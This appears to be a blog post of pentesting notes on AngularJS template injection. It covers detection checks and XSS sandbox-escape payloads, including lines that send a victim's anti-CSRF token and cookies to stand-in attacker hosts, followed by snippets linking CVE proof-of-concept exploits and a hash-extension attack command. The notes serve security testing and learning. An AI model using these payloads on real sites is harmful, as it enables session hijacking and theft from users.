Skip to main content

Pentesting AngularJS



Template Injection & Scope Hacking

- Attack is limited to $scope functions and variables 
 
- Check if an application is using angular JS & Vulnerable to Template Injection or not. 
	- Check the source code for `angular` keyword
	- open dev tools --> Console -->  `angular.element($0).scope()`
		- This lists the scope - all the elements in the page
	- Check the soure code of functions to see what its doing 
		- Developer tools --> Debugger --> Select app.js (whatever JS filename is) --> search for that function ; 
		- Check for any injectable variables (Ex: some empty or dynamic content )
	- Call the function 
		- Send the below payload as input and see the connection going out - which has the victim's anti-csrf token
		-` {{Function_Name("https://attacker.domain/reach.php?x="+anti_csrf"")}}`

- input  `{{4-1}}` --> if the output is 3 --> VULNERABLE 
	- use this any input or search parametes. 

Going Beyond the Scope - XSS via Template Injection

- Works in AngularJS>= 1.6.0 
- https://portswigger.net/research/xss-without-html-client-side-template-injection-with-angularjs 

- Find Angulra Version in Dev tools --> console 
	- angular.version

- Create an alert 
	- `{{constructor.constructor('alert(document.domain)')()}}`
- Get the user cookie 
	-` {{constructor.constructor('$.get(\'//attac.local/log.php?\'+documnet.cookie)')()}}`
- If there any known varaiable 
	- `#var_name=constructor.constructor('$.get(\'//attac.local/log.php?\'+documnet.cookie)')()`


 


Comments

Popular posts from this blog

POC Links for CVE's

  Serach for a CVE here first - Trickest/cve Apache CVE-2024-38475 - CVE-2024-38475 #version less than 2.4.51 CVE-2021-44790 - h ttps://www.exploit-db.com/exploits/51193 #Apache HTTP Server 2.4.50 CVE-2021-42013 - https://www.exploit-db.com/exploits/50406 use https://github.com/mrmtwoj/apache-vulnerability-testing for below CVE's CVE-2024-38472: Apache HTTP Server on Windows UNC SSRF CVE-2024-39573: mod_rewrite proxy handler substitution CVE-2024-38477: Crash resulting in Denial of Service in mod_proxy CVE-2024-38476: Exploitable backend application output causing internal redirects CVE-2024-38475: mod_rewrite weakness with filesystem path matching CVE-2024-38474: Weakness with encoded question marks in backreferences CVE-2024-38473: mod_proxy proxy encoding problem CVE-2023-38709: HTTP response splitting EXIM #suppodily should work for versions below Exim 4.96.1 - is not accurate CVE-2023-42115 - https://github.com/AdaHop-Cyber-Security/Pocy/tree/main

Hash Extension Attacks

  #Install Dependencies sudo apt-get install libssl-dev #Download Hash Extender git clone https://github.com/iagox86/hash_extender.git cd hash_extender make #Run it /hash_extender --data 'username=admin' --secret 16 --append '&isLoggedIn=True' --signature d3a85d3b3087c7e841f84eb4316765c6e1f786074a1f1db996b2e0f8c96f197e2f55433920a630feb07daafadefbc13c947e5225fc509f8241f57f47a8df5311 --format sha512